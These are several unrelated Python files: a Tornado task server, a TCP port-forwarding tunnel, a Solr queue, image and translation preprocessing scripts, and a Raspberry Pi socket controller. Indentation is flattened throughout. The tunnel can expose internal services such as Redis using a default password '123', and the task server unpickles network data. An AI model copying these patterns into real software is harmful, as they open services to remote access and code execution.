| source | python |
|---|---|
__init__.py
|
import pickle
import functools
import tornado.web
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.iostream import StreamClosedError
from tornado.tcpserver import TCPServer
from tornado.tcpclient import TCPClient
from lp import *
from attrs import *
from task import *
def call(fn):
fn()
class viewer(tornado.web.RequestHandler, Attrs):
viewers = []
app = None
@classmethod
def observe(cls, model, point=r"/"):
cls.viewers.append((point, cls, dict(model=model)))
@classmethod
def init(cls):
cls.app = tornado.web.Application(cls.viewers)
cls.app.listen(cls.viewport)
print "Viewer started at", cls.viewport
def initialize(self, model):
self.model = model
@property
def progress(self):
return float(len(self.model.complete))/self.model.count_tasks
def get(self):
self.write("Hello!<br/>")
self.write("Currently complete %.2f%%" % self.progress)
class server(TCPServer, Attrs):
@classmethod
def spawn(cls, fn):
@functools.wraps(fn)
        def wrapped():
cls.instance = cls(fn)
viewer.observe(cls.instance)
viewer.init()
lp.start()
        return wrapped
def __init__(self, genfn):
TCPServer.__init__(self)
self.tasks = list(genfn())
self.count_tasks = len(self.tasks)
self.tasks = iter(enumerate(self.tasks))
self.complete = list()
self.listen(self.port)
self.start()
print "Server started at", self.port
@gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
i, task = self.tasks.next()
data = yield stream.read_until(self.sep)
prev, data = pickle.loads(data)
if data != "hi":
print "From %s:%s received %s for %s" % (address[0], address[1], data, prev)
self.complete.append((prev, data))
else:
print "Connected:", address
task = Task(*task[0], **task[1])
yield stream.write(pickle.dumps(task) + self.sep)
except StreamClosedError:
return
except StopIteration:
break
while True:
yield stream.write(pickle.dumps(self.notask) + self.sep)
class client(TCPClient, Attrs):
ret = (None, Attrs.greet)
@classmethod
def spawn(cls, fn):
@classmethod
def spawner(cls):
instance = cls(fn)
lp.start()
cls.spawner = spawner
@functools.wraps(fn)
        def wrapped(count):
from multiprocessing import Process
processes = []
for i in xrange(0, count):
processes.append(Process(target=cls.spawner))
processes[-1].start()
for p in processes:
p.join()
        return wrapped
def __init__(self, workfn):
TCPClient.__init__(self)
self.stream = None
self.workfn = workfn
@call
@gen.coroutine
def wrap():
print "Connecting to", self.port
self.stream = yield self.connect("localhost", self.port)
self.stream.set_nodelay(True)
lp.later(self.take)
@gen.coroutine
def take(self):
import time
while self.stream is None:
print "Still connecting to %d..." % self.port
yield gen.Task(IOLoop.instance().add_timeout, time.time() + 0.05)
print "Connected!"
try:
while True:
self.stream.write(pickle.dumps(self.ret) + self.sep)
self.ret = yield self.stream.read_until(self.sep)
self.ret = pickle.loads(self.ret)
print "Received task:", self.ret
self.ret = self.ret, self.workfn(*self.ret, **self.ret)
print "Complete task (%s): %s" % self.ret
except StreamClosedError:
return
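# --- Usage sketch (illustrative, not part of the module) --------------------
# A minimal sketch of how the decorators above appear to be meant to be used,
# assuming `Attrs` supplies the shared settings (`port`, `viewport`, `sep`,
# `greet`, `notask`) and `lp` wraps the Tornado IOLoop:
#
#     @server.spawn
#     def make_tasks():
#         # each item is (args, kwargs) passed to Task(*args, **kwargs)
#         return [((n,), {}) for n in range(10)]
#
#     @client.spawn
#     def work(*args, **kwargs):
#         ...  # process one Task's payload
#
#     # one process runs make_tasks() to start the server plus web viewer;
#     # another runs work(4) to spawn four worker processes.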
|
tunnel.py
|
from __future__ import print_function
import sys, time, json
import socket
__version__ = '2.2.0'
READ_BUF_LEN = 1300
TIME_WAIT_SEND_S = 3
TIME_FOR_PING_S = 30
IS_PY3 = sys.version_info >= (3, 0)
def print_it(*args):
print(time.time(), *args)
def send_str(sock, msg, code=0):
if sock:
sock.sendall(msg.encode('utf-8'))
def start_thread(target=None, args=[]):
import threading
th = threading.Thread(target=target, args=args)
    th.daemon = True
th.start()
return True
def make_package(target, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
package = str(target).encode() + 'L'.encode() + str(len(data)).encode() + 'D'.encode() + data
return package
def parse_package(package=''):
    lix = package.index('L'.encode())
    target = int(package[0:lix])
    dix = package.index('D'.encode())
    length = int(package[lix + 1:dix])
    data = package[dix + 1:]
    return target, length, data
def sock_read(sock, buflen=READ_BUF_LEN):
recv = b''
if sock:
try:
recv = sock.recv(buflen)
except:
import traceback
traceback.print_exc()
return recv
def sock_send(sock, data):
    if isinstance(data, str) and IS_PY3:
# str
data = data.encode()
if sock:
try:
sock.sendall(data)
return True
except:
import traceback
traceback.print_exc()
return False
def msg_to_sock(sock, msg):
msg = '[V%s]%s' % (__version__, msg)
send_package(sock, 0, msg.encode())
_sock_recv = {}
_sock_io_map = {}
def sock_str(sock):
import re
s = str(sock)
    rs = re.findall(r"laddr=\('(\S+)', (\d+)\), raddr=\('(\S+)', (\d+)\)", s)
return '%s<->%s' % (rs[0][1], rs[0][3]) if rs else s
def read_package(sock):
if not sock:
print_it("read_package with none")
import traceback
traceback.print_stack()
return
sockid = int(id(sock))
if sockid not in _sock_io_map:
_sock_io_map[sockid] = SockIO(sock)
try:
package = _sock_io_map[sockid].recv()
data = parse_package(package)
if data:
return data[0], data[2]
except:
import traceback
traceback.print_exc()
return None
def send_package(sock, ix, data):
if not sock:
print_it("send_package with none")
import traceback
traceback.print_stack()
return
sockid = int(id(sock))
if sockid not in _sock_io_map:
_sock_io_map[sockid] = SockIO(sock)
return _sock_io_map[sockid].send(make_package(ix, data))
def sock_close(sock, shut=False):
if not sock:
return
if shut:
try:
# sock_send(sock, 'c')
sock.shutdown(2)
except:
import traceback
# traceback.print_exc()
# sock.send(b'')
sock.close()
sockid = int(id(sock))
if sockid in _sock_io_map:
del _sock_io_map[sockid]
# print_it('-----sock_close-----', sock, shut)
# import traceback
# traceback.print_stack()
# print_it('---end sock_close---')
class Lock(object):
def __init__(self, name='default'):
from threading import Lock
self.name = name
self.lock = Lock()
def __enter__(self):
# print_it('locking', self.name)
self.lock.acquire()
# print_it('locked', self.name)
def __exit__(self, *unused):
self.lock.release()
# print_it('released', self.name)
class PackageIt(object):
head = b'DH'
leng = b':'
buffer = b''
def feed(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
self.buffer += data
def recv(self):
hix = self.buffer.find(self.head)
if hix >= 0:
lix = self.buffer.find(self.leng, hix + len(self.head))
if lix > 0:
lns = self.buffer[hix + len(self.head): lix]
pend = lix + len(self.leng) + int(lns)
if len(self.buffer) >= pend:
data = self.buffer[lix + len(self.leng):pend]
self.buffer = self.buffer[pend:]
return data
return None
def make(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
pack = self.head + str(len(data)).encode() + self.leng + data
return pack
class SockIO(object):
    BUF_LEN = 1024
    def __init__(self, sock):
        assert sock
        self.sock = sock
        # keep the framing buffer and locks per socket instead of sharing
        # them at class level across all SockIO instances
        self._pi = PackageIt()
        self._recv_lock = Lock()
        self._send_lock = Lock()
def recv(self):
with self._recv_lock:
while True:
data = self._pi.recv()
                if data is None:
r = self.sock.recv(self.BUF_LEN)
if not r:
raise Exception(u'Socket Error:%s' % str(self.sock))
# print(sock_str(self.sock), 'recv', r)
self._pi.feed(r)
else:
break
return data
def send(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
pack = self._pi.make(data)
ret = False
with self._send_lock:
try:
self.sock.sendall(pack)
ret = True
except:
import traceback
traceback.print_exc()
return ret
def close(self):
self.sock.close()
class Base(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class Runable(Base):
_thread = None
_running = False
def __str__(self):
return '%s' % (self.__class__.__name__)
def _log(self, msg, *args):
print_it(self, msg, *args)
def _run(self):
pass
def _start_run(self):
self._log('start run')
self._run()
self._running = False
self._log('end run')
def start(self):
if not self._running:
self._running = True
th = start_thread(target=self._start_run)
self._thread = th
return th
def stop(self):
self._running = False
self._log('_running', self._running)
class SockRunable(Runable):
_sock = None
def _run(self):
pass
def stop(self):
if self._sock:
self._log('close _sock', self._sock)
sock_close(self._sock, True)
self._sock = None
super(SockRunable, self).stop()
class Tunnel(SockRunable):
sock = None
bind = '0.0.0.0'
port = 0
_client_map = {}
_client_ix = 0
_lock = Lock()
def __str__(self):
return '%s[%d]' % (self.__class__.__name__, self.port)
def _run_con(self, sock, ix):
send_package(self.sock, ix, b'')
while self._running:
recv = sock_read(sock)
# self._log('conn read', ix, len(recv), recv[0:20])
if not self.sock:
break
error = False
if recv:
if not send_package(self.sock, ix, recv):
self.stop()
break
else:
self._log('a con dis, close', ix)
send_package(self.sock, -1 * ix, b'close')
sock_close(sock)
self._del_con(ix)
break
def _del_con(self, ix):
with self._lock:
if ix in self._client_map:
self._log('disconn', ix)
sock_close(self._client_map[ix]['sock'], True)
del self._client_map[ix]
def _add_con(self, sock, addr):
with self._lock:
self._log('add %s %s' % (sock, addr))
self._client_ix += 1
th = start_thread(self._run_con, [sock, self._client_ix])
self._client_map[self._client_ix] = {
'th': th,
'sock': sock
}
return th
def _run_sock(self):
while self._running:
recv = read_package(self.sock)
if recv:
ix, data = recv
if ix > 0:
if ix in self._client_map:
d = self._client_map[ix]
# self._log('trans', ix, data)
sock_send(d['sock'], data)
elif ix == 0:
if data == b'ping':
send_package(self.sock, 0, b'pong')
elif data == b'pong':
pass
else:
self._del_con(abs(ix))
else:
self.stop()
def _run_ping(self):
while self._running:
send_package(self.sock, 0, b'ping')
time.sleep(TIME_FOR_PING_S)
def _run(self):
try:
self._sock_th = start_thread(self._run_sock)
self._ping_th = start_thread(self._run_ping)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('binding %s:%s' % (self.bind, self.port))
# sock.setblocking(False)
sock.bind((self.bind, self.port), )
sock.listen(1000)
self._sock = sock
self._log('running tunnel %s:%s' % (self.bind, self.port))
while self._running:
try:
clt_con, clt_add = sock.accept()
ret = False
if self._running:
ret = self._add_con(clt_con, clt_add)
if not ret:
sock_close(clt_con)
except:
import traceback
traceback.print_exc()
self.stop()
except Exception as e:
import traceback
traceback.print_exc()
msg_to_sock(self.sock, e)
def stop(self):
with self._lock:
if self.sock:
self._log('close sock', self.sock)
sock_close(self.sock)
self.sock = None
for d in self._client_map.values():
sock_close(d['sock'], True)
self._client_map.clear()
if self._sock:
sock_close(self._sock)
self._sock = None
self._running = False
# In Python2, connect to listen port to raise close and release.
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# s.connect(('127.0.0.1', self.port), )
# except:
# import traceback
# traceback.print_exc()
super(Tunnel, self).stop()
self._log('stop')
class Server(SockRunable):
bind = '0.0.0.0'
port = 1990
passwd = '123'
_tunprocs_map = {}
_tunprocs_lock = Lock()
def _ready(self, sock, addr):
_, auth = read_package(sock)
# self._log('auth', auth)
data = json.loads(auth)
# self._log('tun req data', data)
if self.passwd and self.passwd != data.get('passwd'):
# send_str(sock, 'password error!')
self._log('Password Error!!!')
send_package(sock, 0, json.dumps({'status': 'error', 'message': "Password Error!!!"}))
return
send_package(sock, 0, json.dumps({'status': 'ok', 'version': __version__}))
if data.get('command'):
cmds = data['command'].split(' ')
cmd = cmds[0]
if cmd == 'status':
ret = '; '.join([d['key'] for d in self._tunprocs_map.values()])
send_package(sock, 0, json.dumps({'status': 'success', 'message': ret}))
elif cmd == 'kill':
wkills = set(cmds[1:])
killeds = set()
for p, cxt in self._tunprocs_map.items():
if 'all' in wkills or cxt['key'] in wkills:
self._close_tun_cxt(cxt)
killeds.add(cxt['key'])
send_package(sock, 0, json.dumps({'status': 'success', 'message': '; '.join(killeds)}))
else:
send_package(sock, 0, json.dumps({'status': 'error', 'message': "Unknow %s" % cmd}))
return
cxt = {'sock': sock}
data.setdefault('bind', '0.0.0.0')
for k in ['bind', 'port']:
if data.get(k):
cxt[k] = data[k]
cxt['key'] = '%s:%s' % (cxt['bind'], cxt['port'])
self._log('new client version: %s' % data['version'])
from multiprocessing import Process
def tunrun():
t = Tunnel(**cxt)
t.start()
# cxt['tun'] = t
while t._running and self._running:
time.sleep(3)
proc = Process(target=tunrun)
proc.start()
with self._tunprocs_lock:
cxt['proc'] = proc
self._tunprocs_map[proc] = cxt
return proc
def _close_tun_cxt(self, cxt):
sock = cxt.pop('sock', None)
proc = cxt.pop('proc', None)
try:
if sock:
sock_close(sock)
except:
pass
try:
if proc:
proc.terminate()
except:
pass
def _check_tunprocs(self):
while self._running:
delps = []
for p in self._tunprocs_map:
if not p.is_alive():
delps.append(p)
if delps:
with self._tunprocs_lock:
for p in delps:
cxt = self._tunprocs_map[p]
self._close_tun_cxt(cxt)
self._log('remove process', cxt)
del self._tunprocs_map[p]
self._log('now process count=%d' % len(self._tunprocs_map))
time.sleep(10)
def _run(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('binding %s:%s' % (self.bind, self.port))
sock.bind((self.bind, self.port), )
sock.listen(1000)
self._sock = sock
self._log('running server %s:%s' % (self.bind, self.port))
except:
import traceback
traceback.print_exc()
self.stop()
start_thread(target=self._check_tunprocs)
while self._running:
try:
clt_con, clt_add = self._sock.accept()
self._log('new client req', clt_con, clt_add)
try:
ret = self._ready(clt_con, clt_add)
if not ret:
time.sleep(TIME_WAIT_SEND_S)
sock_close(clt_con)
except:
import traceback
traceback.print_exc()
except:
import traceback
traceback.print_exc()
self.stop()
class Client(SockRunable):
server = '192.168.1.102'
port = 1990
passwd = '123'
proxy_port = 1091
proxy_bind = '0.0.0.0'
target_host = '127.0.0.1'
target_port = 6379
command = ''
_client_map = {}
def _run_con(self, ix, sock):
while self._running:
recv = sock_read(sock)
if len(recv):
send_package(self._sock, ix, recv)
else:
send_package(self._sock, -1 * ix, b'close')
self._log('a do discon', ix)
time.sleep(TIME_WAIT_SEND_S)
sock_close(sock)
break
def _add_con(self, ix):
try:
self._log('add conn', ix)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('connecting target %s:%s' % (self.target_host, self.target_port))
sock.connect((self.target_host, self.target_port), )
self._log('connected target %s:%s' % (self.target_host, self.target_port))
self._client_map[ix] = {
'sock': sock,
'th': start_thread(target=self._run_con, args=[ix, sock])
}
return self._client_map[ix]
except:
import traceback
traceback.print_exc()
def _run_ping(self):
while self._running:
send_package(self._sock, 0, b'ping')
time.sleep(TIME_FOR_PING_S)
def _run(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock = sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('connecting server %s:%s' % (self.server, self.port))
sock.connect((self.server, self.port), )
self._log('connected server %s:%s' % (self.server, self.port))
self._log('verifying...')
send_package(sock, 0, json.dumps({'version': __version__, 'command': self.command, 'passwd': self.passwd, 'bind': self.proxy_bind, 'port': self.proxy_port}))
_, data = read_package(sock)
ret = json.loads(data)
if ret['status'] == 'ok':
self._log('server version V%s, verified!' % ret['version'])
else:
self._log('\033[31m%s: %s\033[0m' % (ret['status'], ret['message']))
raise Exception(ret['message'])
except:
import traceback
traceback.print_exc()
self.stop()
return
self._ping_th = start_thread(target=self._run_ping)
self._log('tunnel', '%s:%s' % (self.target_host, self.target_port), '<->', '%s:%s' % (self.server, self.proxy_port))
while self._running:
recv = read_package(sock)
if recv:
ix, data = recv
if ix > 0:
if ix not in self._client_map:
# new connect
d = self._add_con(ix)
else:
d = self._client_map[ix]
if d:
# self._log('trans', ix, data[0:20])
sock_send(d['sock'], data)
else:
send_package(sock, -1 * ix, b'')
elif ix == 0:
# message
if data == b'ping':
send_package(sock, 0, b'pong')
elif data == b'pong':
pass
else:
self._log('[Server]\033[31m%s\033[0m' % data.decode())
self.stop()
else:
nix = abs(ix)
if nix in self._client_map:
if data == b'ping':
# ping
send_package(sock, -1 * ix, b'pong')
elif not data or data == b'close':
d = self._client_map[nix]
sock_close(d['sock'])
del self._client_map[nix]
self._log('discon', nix)
else:
self.stop()
def stop(self):
for d in self._client_map.values():
sock_close(d['sock'])
self._client_map.clear()
super(Client, self).stop()
self._log('stop')
def parse_endpoint(s):
if ':' in s:
r = s.split(':')
return r[0], int(r[1])
elif s:
return '0.0.0.0', int(s)
    raise Exception(u'%s is not an endpoint!' % s)
def main():
import time, signal, argparse
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-t', '--target', help='target endpoint, such as: 127.0.0.1:8080', type=parse_endpoint)
parser.add_argument('-s', '--server', help='server endpoint, such as: 192.168.1.3:1990', type=parse_endpoint)
parser.add_argument('-p', '--port', help='server proxy port, such as: 192.168.1.3:1090', type=parse_endpoint)
parser.add_argument('-b', '--bind', help='the server bind endpoint, such as: 0.0.0.0:1990', type=parse_endpoint)
parser.add_argument('-e', '--passwd', help='the password, default is empty', type=str, default='')
    parser.add_argument('-c', '--command', help='the command to send to the server (e.g. status, kill), default is empty', nargs='+', type=str, default='')
args = parser.parse_args()
if args.bind:
# server
d = {
'bind': args.bind[0],
'port': args.bind[1],
'passwd': args.passwd,
}
run = Server(**d)
elif args.server:
# client
d = {
'server': args.server[0],
'port': args.server[1],
'proxy_bind': args.port[0] if args.port else '0.0.0.0',
'proxy_port': args.port[1] if args.port else 8080,
'target_host': args.target[0] if args.target else '127.0.0.1',
'target_port': args.target[1] if args.target else 8080,
'passwd': args.passwd,
'command': ' '.join(args.command),
}
run = Client(**d)
else:
parser.print_help()
exit(-1)
def stop(a, b):
print_it('stop')
run.stop()
signal.signal(signal.SIGINT, stop)
print_it('---pytunnel V%s---' % __version__)
run.start()
while run._running:
time.sleep(1)
time.sleep(1)
if __name__ == '__main__':
main()
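# Example invocations (endpoints below are placeholders):
#   server:      python tunnel.py -b 0.0.0.0:1990 -e secret
#   client:      python tunnel.py -s <server-ip>:1990 -p 1091 -t 127.0.0.1:6379 -e secret
#   management:  python tunnel.py -s <server-ip>:1990 -e secret -c status
# The client asks the server to listen on port 1091 and tunnels that traffic
# back to 127.0.0.1:6379 on the client's side.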
|
solrqueue.py
|
from datetime import datetime
import logging
from queue import Empty, Full, Queue
import threading
from haystack.utils import get_identifier
from api_v2.search.index import TxnAwareSearchIndex
LOGGER = logging.getLogger(__name__)
class SolrQueue:
def __init__(self):
self._queue = Queue()
self._prev_queue = None
self._stop = threading.Event()
self._thread = None
self._trigger = threading.Event()
def add(self, index_cls, using, instances):
ids = [instance.id for instance in instances]
LOGGER.debug("Solr queue add %s", ids)
try:
self._queue.put( (index_cls, using, ids, 0) )
except Full:
LOGGER.warning("Solr queue full")
def delete(self, index_cls, using, instances):
ids = [get_identifier(instance) for instance in instances]
LOGGER.debug("Solr queue delete %s", ids)
try:
self._queue.put( (index_cls, using, ids, 1) )
except Full:
LOGGER.warning("Solr queue full")
def setup(self, app=None):
if app:
app["solrqueue"] = self
app.on_startup.append(self.app_start)
app.on_cleanup.append(self.app_stop)
self._prev_queue = TxnAwareSearchIndex._backend_queue
TxnAwareSearchIndex._backend_queue = self
async def app_start(self, _app=None):
self.start()
async def app_stop(self, _app=None):
self.stop()
def __enter__(self):
self.setup()
self.start()
return self
    def __exit__(self, exc_type, value, tb):
        # if handling an exception, don't wait for the worker thread
        self.stop(join=not exc_type)
        TxnAwareSearchIndex._backend_queue = self._prev_queue
def start(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self, join=True):
self._stop.set()
self._trigger.set()
if join:
self._thread.join()
def trigger(self):
self._trigger.set()
def _run(self):
while True:
self._trigger.wait(5)
self._drain()
if self._stop.is_set():
return
def _drain(self):
last_index = None
last_using = None
last_del = 0
last_ids = set()
while True:
try:
index_cls, using, ids, delete = self._queue.get_nowait()
except Empty:
index_cls = None
if last_index and last_index == index_cls and last_using == using and last_del == delete:
last_ids.update(ids)
else:
if last_index:
if last_del:
self.remove(last_index, last_using, last_ids)
else:
self.update(last_index, last_using, last_ids)
if not index_cls:
break
last_index = index_cls
last_using = using
last_del = delete
last_ids = set(ids)
def update(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Updating %d row(s) in solr queue: %s", len(ids), ids)
rows = index.index_queryset(using).filter(id__in=ids)
backend.update(index, rows)
else:
LOGGER.error("Failed to get backend. Unable to update %d row(s) in solr queue: %s", len(ids), ids)
def remove(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Removing %d row(s) in solr queue: %s", len(ids), ids)
# backend.remove has no support for a list of IDs
backend.conn.delete(id=ids)
else:
LOGGER.error("Failed to get backend. Unable to update %d row(s) in solr queue: %s", len(ids), ids)
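# --- Usage sketch (illustrative only) ----------------------------------------
# SolrQueue can be used as a context manager (e.g. in a batch job) or attached
# to an aiohttp-style app that exposes on_startup/on_cleanup hooks; `MyIndex`
# and `instances` below are placeholders.
#
#   with SolrQueue() as sq:
#       sq.add(MyIndex, "default", instances)   # queued, batched on drain
#       sq.trigger()                            # wake the worker early
#
#   # long-running service:
#   #   sq = SolrQueue()
#   #   sq.setup(app)   # registers app_start/app_stop and swaps in this queue
#   #                   # as the TxnAwareSearchIndex backend queue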
|
parallel_npy2dzi.py
|
import os
import shutil
import subprocess
import sys
import time
from multiprocessing import Process

import fire
import numpy as np
import PIL
from PIL import Image

import deepzoom
def worker(wsi_name, web_dir, shrink_factor):
# disable safety checks for large images
PIL.Image.MAX_IMAGE_PIXELS = None
assert(wsi_name[-4:] == ".npy")
wsi_prefix = wsi_name[:-4]
prefix_path = os.path.join(web_dir, "images", wsi_prefix)
npy_path = prefix_path + ".npy"
png_path = prefix_path + ".png"
dzi_path = prefix_path + ".dzi"
base_html_path = "npy2dzi.html"
new_html_path = os.path.join(web_dir, "index.html")
openseadragon_src = "openseadragon/"
openseadragon_dst = os.path.join(web_dir, "openseadragon/")
iter_name = web_dir[web_dir.rindex("/") + 1:]
title = iter_name + " " + wsi_name
START_TIME = time.time()
print("Loading .npy file")
img = np.load(npy_path)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
START_TIME = time.time()
print("Reducing .npy file")
if shrink_factor == 1:
comp_img = img
else:
comp_img = np.zeros((img.shape[0] // shrink_factor, img.shape[1] // shrink_factor, img.shape[2]), dtype=np.uint32)
print(comp_img.shape)
for i in range(shrink_factor):
j1 = img.shape[0] - img.shape[0] % shrink_factor
j2 = img.shape[1] - img.shape[1] % shrink_factor
comp_img += img[i:j1:shrink_factor, i:j2:shrink_factor]
comp_img //= shrink_factor
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
# create png files
START_TIME = time.time()
print("Creating .png file")
Image.fromarray(comp_img.astype(np.uint8)).save(png_path, compress_level=1)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
# create dzi files
START_TIME = time.time()
print("Creating .dzi file")
creator = deepzoom.ImageCreator(
tile_size=256,
tile_overlap=0,
tile_format="png",
image_quality=1.0,
)
creator.create(png_path, dzi_path)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
START_TIME = time.time()
print("Creating HTML files")
# create html files
with open(base_html_path, "r") as f:
HTML_STR = "".join(f.readlines())
HTML_STR = HTML_STR.replace("{REPLACE_wsi_prefix}", os.path.join("images", wsi_prefix))
HTML_STR = HTML_STR.replace("{REPLACE_title}", title)
with open(new_html_path, "w") as f:
f.write(HTML_STR)
# copy openseadragon
if not os.path.isdir(openseadragon_dst):
shutil.copytree(openseadragon_src, openseadragon_dst)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
def main(wsi_prefix, model_name, shrink_factor, start_iter, end_iter, incr_iter):
    PROGRAM_START_TIME = time.time()
    WSI_NAME = str(wsi_prefix) + "_converted.npy"
    jobs = []
    # use the CLI-provided iteration range and shrink factor
    for i in range(start_iter, end_iter + 1, incr_iter):
        WEB_DIR = "./results/" + model_name + "/test_latest_iter" + str(i)
        p = Process(target=worker, args=(WSI_NAME, WEB_DIR, shrink_factor))
        jobs += [p]
        p.start()
    # wait for all conversion workers to finish
    for p in jobs:
        p.join()
if __name__=="__main__":
fire.Fire(main)
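# Example invocation via python-fire (values are placeholders):
#   python parallel_npy2dzi.py --wsi_prefix sample01 --model_name my_model \
#       --shrink_factor 2 --start_iter 1003200 --end_iter 1104000 --incr_iter 4800
# One worker process is spawned per iteration directory under ./results/<model_name>/.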
|
pangeamt_files_preprocess.py
|
#!/usr/bin/env python
import os
import json
import argparse
from multiprocessing import Process
from pangeamt_toolkit.processors import Pipeline
# Parallel preprocess of train, dev and test files.
def _get_parser():
parser = argparse.ArgumentParser(description='Preprocess file.')
parser.add_argument('config', help="Path to config file")
parser.add_argument('data', help="Path to data folder")
parser.add_argument('src', help='Src lang')
parser.add_argument('tgt', help='Tgt lang')
return parser
def _load_pipelines(config, src_lang, tgt_lang):
# Loads the main config for the source files and the secondary config
# for the target files
with open(config, 'r') as config_file:
config = json.load(config_file)
print('Loading pipelines..')
pipelines = {
src_lang:\
Pipeline(config['pipeline_config'], config['src_lang'],\
config['tgt_lang']),
tgt_lang:\
Pipeline(config['pipeline_config_tgt'], config['tgt_lang'])
}
print('Pipelines loaded..')
return pipelines
def _process(lang, pipelines):
pipeline = pipelines[lang]
files = ['train', 'dev', 'test']
for file in files:
path = f'{args.data}/{file}.{lang}'
# Checks if the file exists
if os.path.isfile(path):
print(f"Started processing {path.split('/')[-1]}")
pipeline.preprocess_file(path)
print(f"Finished processing {path.split('/')[-1]}")
else:
pass
def main(args):
langs = [args.src, args.tgt]
to_join = []
# loads the pipelines
pipelines = _load_pipelines(args.config, args.src, args.tgt)
for lang in langs:
# Creates and spawns a process to parallelise the preprocess
p = Process(target=_process, args=(lang, pipelines,))
p.start()
to_join.append(p)
# Waits for all the processes to finish
for p in to_join:
p.join()
if __name__ == "__main__":
parser = _get_parser()
args = parser.parse_args()
os.chdir(os.path.dirname(os.path.realpath(args.config)))
main(args)
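# Example invocation (paths and language codes are placeholders):
#   python pangeamt_files_preprocess.py config.json ./data en es
# This preprocesses {data}/train.{lang}, {data}/dev.{lang} and {data}/test.{lang}
# for both languages, one process per language.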
|
socket_test.py
|
import os    # importing os library so as to communicate with the system
import time  # importing time library to make the RPi wait, because it's too impatient
time.sleep(1)  # as I said, it is too impatient; if this delay is removed you may get an error
import socket
import queue
import threading
max_value = 1675 #change this if your ESC's max value is different or leave it be
min_value = 1500 #change this if your ESC's min value is different or leave it be
accelerate_value = 1800
brake_value = 1300
actual_max_speed = 0.83 # m/s
class DataCapture:
def __init__(self):
self.conn, self.addr = serv.accept()
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read data as soon as they are available, keeping only most recent one
def _reader(self):
while True:
data = self.conn.recv(1024)
if not data:
self.q.put(data)
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
                except queue.Empty:
pass
self.q.put(data)
def recv(self):
return self.q.get()
def close(self):
self.conn.close()
def arm(): #This is the arming procedure of an ESC
print("RPI is arming")
time.sleep(3)
def start_up():
print(f"accelerating: {accelerate_value}")
time.sleep(0.3)
def set_speed(speed):
#TODO interpolate speed values to the corresponding input values by ESC
span = max_value - min_value
# Convert the left range into a 0-1 range (float)
value_scaled = speed / actual_max_speed
# Convert the 0-1 range into a value in the right range.
output = int((value_scaled * span) + min_value)
print (f"speed: {speed}; output: {output}")
def full_brake():
print (f"brake: {brake_value}")
def stop(): # This will stop every action your Pi is performing for the ESC, of course.
print("stopping RPI")
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(('0.0.0.0', 9999))
serv.listen(5)
while True:
conn = DataCapture()
start_up_toggle = True
is_stopped = True
while True:
print ("Initializing...")
data = conn.recv()
if not data: break
if data.decode('ascii') == "init":
arm()
start_up_toggle = True
break
while True:
data = conn.recv()
if not data: break
speed = float(data.decode('ascii'))
if start_up_toggle and speed > 0:
start_up()
start_up_toggle = False
is_stopped = False
if speed == 0:
start_up_toggle = True
if not is_stopped:
full_brake()
is_stopped = True
set_speed(speed)
if not is_stopped:
full_brake()
conn.close()
print ('client disconnected')
stop()
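# --- Example client (illustrative; run from another terminal or machine) ----
#   import socket, time
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(("<rpi-ip>", 9999))
#   s.sendall(b"init")               # triggers arm()
#   time.sleep(3)
#   for v in (0.2, 0.5, 0.0):        # speeds in m/s; 0 triggers full_brake()
#       s.sendall(str(v).encode("ascii"))
#       time.sleep(0.5)
#   s.close()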
|
subprocess.py
|
from threading import Thread
import pyrealtime as prt
class SubprocessLayer(prt.TransformMixin, prt.ThreadLayer):
def __init__(self, port_in, cmd, *args, encoder=None, decoder=None, **kwargs):
super().__init__(port_in, *args, **kwargs)
self.cmd = cmd
self.proc = None
self.read_thread = None
self._encode = encoder if encoder is not None else self.encode
self._decode = decoder if decoder is not None else self.decode
def encode(self, data):
return data + "\n"
def decode(self, data):
return data.rstrip().decode('utf-8')
def initialize(self):
try:
import pexpect.popen_spawn
except ImportError:
raise ModuleNotFoundError("pexpect required to use subprocess layers")
self.proc = pexpect.popen_spawn.PopenSpawn(self.cmd)
self.read_thread = Thread(target=self.read_loop)
self.read_thread.start()
def read_loop(self):
import pexpect
while True:
try:
index = self.proc.expect(".*\n")
data = self.proc.match[index]
self.handle_output(self._decode(data))
except pexpect.exceptions.EOF:
print("end of file")
return prt.LayerSignal.STOP
def transform(self, data):
self.proc.write(self._encode(data))
return None
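# --- Usage sketch (illustrative; assumes an upstream pyrealtime layer feeding
# `port_in` and a command such as "python -u worker.py") ---------------------
#   layer = SubprocessLayer(port_in, "python -u worker.py")
#   # each item arriving on port_in is encoded (newline-terminated text by
#   # default) and written to the child's stdin; every line the child prints
#   # is decoded and emitted downstream via handle_output().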
|
prog3.py
|
